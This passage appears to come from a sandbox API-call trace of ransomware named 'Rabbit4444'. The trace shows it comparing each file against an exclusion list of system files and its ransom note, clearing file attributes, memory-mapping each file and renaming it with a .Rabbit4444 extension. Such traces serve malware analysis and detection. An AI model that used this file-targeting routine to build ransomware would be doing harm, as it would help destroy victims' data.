"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0cdc534d-a9ff-450d-91d8-96c341ed44aa}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.257] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43150496, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x43150496, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231aa1ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x32e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms", cAlternateFileName="CL4A77~1.SET")) returned 1 [0058.257] lstrcmpiW (lpString1="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.257] lstrcmpiW (lpString1="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.258] lstrcmpiW (lpString1="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.258] lstrcmpiW (lpString1="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms", lpString2=".") returned 1 [0058.258] lstrcmpiW (lpString1="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms", lpString2="..") returned 1 [0058.258] lstrcmpiW (lpString1="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms", lpString2="windows") returned -1 [0058.258] lstrcmpiW (lpString1="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.258] lstrcmpiW (lpString1="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.258] lstrcmpiW (lpString1="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms", lpString2="boot") returned 1 [0058.258] lstrcmpiW (lpString1="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.258] lstrcmpiW (lpString1="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.258] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms" | out: lpString1="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms") returned="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms" [0058.258] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.258] lstrlenW (lpString="Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms") returned 64 [0058.258] lstrlenW (lpString="Rabbit4444") returned 10 [0058.258] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.258] lstrlenW (lpString=".dll") returned 4 [0058.258] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.258] lstrlenW (lpString=".lnk") returned 4 [0058.258] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.258] lstrlenW (lpString=".ini") returned 4 [0058.258] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.258] lstrlenW (lpString=".sys") returned 4 [0058.258] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.258] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.259] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.259] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14956940470) returned 1 [0058.259] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=814) returned 1 [0058.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0058.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0058.259] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x630, lpName=0x0) returned 0x298 [0058.260] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x630) returned 0x70000 [0058.261] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.261] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.261] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.261] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.261] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14957187877) returned 1 [0058.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0058.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0058.261] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.261] CloseHandle (hObject=0x298) returned 1 [0058.261] CloseHandle (hObject=0x278) returned 1 [0058.261] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms.Rabbit4444") returned 192 [0058.261] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.262] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4437e3da, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4437e3da, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23078eee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms", cAlternateFileName="CL22DC~1.SET")) returned 1 [0058.262] lstrcmpiW (lpString1="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.262] lstrcmpiW (lpString1="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.262] lstrcmpiW (lpString1="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.262] lstrcmpiW (lpString1="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms", lpString2=".") returned 1 [0058.262] lstrcmpiW (lpString1="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms", lpString2="..") returned 1 [0058.262] lstrcmpiW (lpString1="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms", lpString2="windows") returned -1 [0058.262] lstrcmpiW (lpString1="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.262] lstrcmpiW (lpString1="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.262] lstrcmpiW (lpString1="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms", lpString2="boot") returned 1 [0058.263] lstrcmpiW (lpString1="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.263] lstrcmpiW (lpString1="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.263] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms" | out: lpString1="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms") returned="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms" [0058.263] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.263] lstrlenW (lpString="Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms") returned 64 [0058.263] lstrlenW (lpString="Rabbit4444") returned 10 [0058.263] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.263] lstrlenW (lpString=".dll") returned 4 [0058.263] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.263] lstrlenW (lpString=".lnk") returned 4 [0058.263] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.263] lstrlenW (lpString=".ini") returned 4 [0058.263] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.263] lstrlenW (lpString=".sys") returned 4 [0058.263] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.263] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0df721fa-f921-4416-a491-1924f212c705}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.263] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.263] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14957418257) returned 1 [0058.263] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=961) returned 1 [0058.264] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0058.264] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0058.264] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0058.265] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0058.265] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.265] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.266] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14957674181) returned 1 [0058.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0058.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0058.266] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.266] CloseHandle (hObject=0x298) returned 1 [0058.266] CloseHandle (hObject=0x278) returned 1 [0058.266] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms.Rabbit4444") returned 192 [0058.266] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0df721fa-f921-4416-a491-1924f212c705}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0df721fa-f921-4416-a491-1924f212c705}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.267] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x446c57ae, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x446c57ae, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x232b5237, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x396, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms", cAlternateFileName="CLD7B6~1.SET")) returned 1 [0058.267] lstrcmpiW (lpString1="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.267] lstrcmpiW (lpString1="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.267] lstrcmpiW (lpString1="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.268] lstrcmpiW (lpString1="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms", lpString2=".") returned 1 [0058.268] lstrcmpiW (lpString1="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms", lpString2="..") returned 1 [0058.268] lstrcmpiW (lpString1="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms", lpString2="windows") returned -1 [0058.268] lstrcmpiW (lpString1="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.268] lstrcmpiW (lpString1="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.268] lstrcmpiW (lpString1="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms", lpString2="boot") returned 1 [0058.268] lstrcmpiW (lpString1="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.268] lstrcmpiW (lpString1="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.268] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms" | out: lpString1="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms") returned="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms" [0058.268] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.268] lstrlenW (lpString="Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms") returned 64 [0058.268] lstrlenW (lpString="Rabbit4444") returned 10 [0058.268] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.268] lstrlenW (lpString=".dll") returned 4 [0058.268] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.268] lstrlenW (lpString=".lnk") returned 4 [0058.268] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.268] lstrlenW (lpString=".ini") returned 4 [0058.268] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.268] lstrlenW (lpString=".sys") returned 4 [0058.268] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.268] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.269] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.269] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14957946203) returned 1 [0058.269] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=918) returned 1 [0058.269] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0058.269] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0058.269] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6a0, lpName=0x0) returned 0x298 [0058.270] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a0) returned 0x70000 [0058.271] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.271] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.271] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.271] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.271] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.271] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.271] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.271] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.271] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14958198863) returned 1 [0058.271] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0058.271] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0058.271] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.271] CloseHandle (hObject=0x298) returned 1 [0058.271] CloseHandle (hObject=0x278) returned 1 [0058.272] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms.Rabbit4444") returned 192 [0058.272] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.272] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4486918e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4486918e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224ffa05, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms", cAlternateFileName="CL9A4B~1.SET")) returned 1 [0058.276] lstrcmpiW (lpString1="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.277] lstrcmpiW (lpString1="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.277] lstrcmpiW (lpString1="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.277] lstrcmpiW (lpString1="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms", lpString2=".") returned 1 [0058.277] lstrcmpiW (lpString1="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms", lpString2="..") returned 1 [0058.277] lstrcmpiW (lpString1="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms", lpString2="windows") returned -1 [0058.277] lstrcmpiW (lpString1="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.277] lstrcmpiW (lpString1="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.277] lstrcmpiW (lpString1="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms", lpString2="boot") returned 1 [0058.277] lstrcmpiW (lpString1="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.277] lstrcmpiW (lpString1="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.277] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms" | out: lpString1="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms") returned="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms" [0058.277] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.277] lstrlenW (lpString="Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms") returned 64 [0058.277] lstrlenW (lpString="Rabbit4444") returned 10 [0058.277] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.277] lstrlenW (lpString=".dll") returned 4 [0058.277] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.277] lstrlenW (lpString=".lnk") returned 4 [0058.277] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.277] lstrlenW (lpString=".ini") returned 4 [0058.277] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.277] 